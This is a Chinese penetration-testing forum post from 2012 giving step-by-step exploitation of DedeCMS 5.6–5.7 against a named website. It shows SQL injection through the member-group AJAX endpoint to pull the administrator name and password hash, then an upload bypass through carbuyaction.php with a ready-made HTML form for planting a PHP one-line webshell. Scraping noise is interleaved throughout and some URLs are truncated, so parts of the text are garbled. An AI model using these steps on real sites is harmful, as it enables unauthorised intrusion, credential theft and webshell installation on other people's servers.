中国网络渗透测试联盟

标题: dedecms5.6-5.7注入与上传漏洞利用 [打印本页]

---

作者: admin    时间: 2012-9-13 10:56
标题: dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
: B  o2 H9 L# v& W! ]( v这站 http://www.political-security.com/
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，
www.political-security.com/data/mysql_error_trace.inc 爆后台
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面，如图说明存在该漏洞。
/ V; O- {, t( X- r. |9 H然后写上语句
查看管理员帐号
http://www.political-security.co ... &membergroup=@`
+ K9 E2 J' \' O' a8 E) i! d/ e- H
( b3 j% o  k' c) q  u" u1 ?admin
) c! l5 c! [1 x& e
7 H% v( U- e- D. \9 F6 Z5 P5 M查看管理员密码
, i! I7 \; \1 Y1 r0 b3 f　http://www.political-security.co ... &membergroup=@`

& w: j; t. F8 b4 ]7 C9 i) y9 i' Q8d29b1ef9f8c5a5af429

查看管理员密码
, p. t4 `: l, _' P( g
得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5
; T4 Z  I0 @: H/ F  H
2 k: c# C$ H! i+ k! ]8d2
9 c$ Q4 E4 L6 |) Z9 X9b1ef9f8c5a5af42
! T' G- a3 b: t9
: K4 g! c0 T0 V" ~# E1 H
cmd5没解出来 只好测试第二个方法

* T( B, A) D! G
②上传漏洞：

. V' ]. a' G  T& Y只要登陆会员中心，然后访问页面链接
( D6 l3 e! d/ a+ O- u% v% T“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
5 [$ c! s# D/ n  {7 j
如图，说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
或者
( p, _$ O" o, r+ G9 e即可上传成功

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2